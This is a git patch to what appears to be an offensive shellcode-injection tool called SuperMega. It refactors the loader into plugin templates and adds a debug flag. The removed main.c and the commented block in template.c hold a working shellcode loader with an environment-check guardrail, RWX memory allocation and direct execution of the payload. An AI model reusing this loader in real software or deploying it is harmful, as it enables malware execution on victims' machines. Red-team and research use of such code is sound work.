From 49b8c45b67bf6ad668fef10eb534aeb8383f0801 Mon Sep 17 00:00:00 2001 From: Dobin Date: Sun, 11 Feb 2024 10:59:28 +0000 Subject: [PATCH] refactor: cleanup --- project.py | 2 +- source/iat_reuse/main.c | 43 ------------------------------------- source/iat_reuse/template.c | 24 ++++++--------------- supermega.py | 4 ++++ 4 files changed, 11 insertions(+), 62 deletions(-) delete mode 100644 source/iat_reuse/main.c diff --git a/project.py b/project.py index 0b8084b..b2c931a 100644 --- a/project.py +++ b/project.py @@ -19,7 +19,7 @@ class Project(): self.exe_capabilities: ExeCapabilities = None # debug - self.show_command_output = True + self.show_command_output = False self.verify: bool = False self.try_start_loader_shellcode: bool = False diff --git a/source/iat_reuse/main.c b/source/iat_reuse/main.c deleted file mode 100644 index 31a2be3..0000000 --- a/source/iat_reuse/main.c +++ /dev/null @@ -1,43 +0,0 @@ -#include - -char *supermega_payload; - -int main() -{ - // Execution Guardrail: Env Check - wchar_t envVarName[] = {'U','S','E','R','P','R','O','F','I','L','E', 0}; - wchar_t tocheck[] = {'C',':','\\','U','s','e','r','s','\\','h','a','c','k','e','r', 0}; // L"C:\\Users\\hacker" - WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency! - DWORD result = ((DWORD(WINAPI*)(LPCWSTR, LPWSTR, DWORD))GetEnvironmentVariableW)(envVarName, buffer, 1024); - if (result == 0) { - return 6; - } - if (mystrcmp(buffer, tocheck) != 0) { - return 6; - } - - // Copy shellcode - // ntdll.dll: VirtualAlloc() - char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40); - // 11223344 is a magic number which will be replaced in the asm source - // with the payload length. - for(int n=0; n<11223344; n++) { - dest[n] = supermega_payload[n]; - } - - // Exec shellcode - (*(void(*)())(dest))(); - - return 0; -} - -int mystrcmp(wchar_t* str1, wchar_t* str2) { - int i = 0; - while (str1[i] != L'\0' && str2[i] != L'\0') { - if (str1[i] != str2[i]) { - return 1; - } - i++; - } - return 0; -} \ No newline at end of file diff --git a/source/iat_reuse/template.c b/source/iat_reuse/template.c index 482b85f..6ede880 100644 --- a/source/iat_reuse/template.c +++ b/source/iat_reuse/template.c @@ -16,31 +16,19 @@ int main() return 6; } - + // Allocate RWX segment // char *dest = ... {{ plugin_allocator }} - // dest[] = supermega_payload[] - // len: 0x11223344 + // Copy + // from: supermega_payload[] + // to: dest[] + // len: 0x11223344 {{ plugin_decoder }} - // dest[] + // Execute *dest {{ plugin_executor }} - /* - - // Copy shellcode - // ntdll.dll: VirtualAlloc() - char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40); - // 11223344 is a magic number which will be replaced in the asm source - // with the payload length. - for(int n=0; n<11223344; n++) { - dest[n] = supermega_payload[n]; - } - - // Exec shellcode - (*(void(*)())(dest))(); -*/ return 0; } diff --git a/supermega.py b/supermega.py index b1102be..c0e3d46 100644 --- a/supermega.py +++ b/supermega.py @@ -28,8 +28,12 @@ def main(): parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode') parser.add_argument('--inject', type=str, help='The path to the file where we will inject ourselves in') parser.add_argument('--verify', type=str, help='Debug: Perform verification: std/iat') + parser.add_argument('--show', type=str, help='Debug: Show tool output') args = parser.parse_args() + if args.show: + project.show_command_output = True + if args.verify: project.payload = "shellcodes/createfile.bin" project.verify = True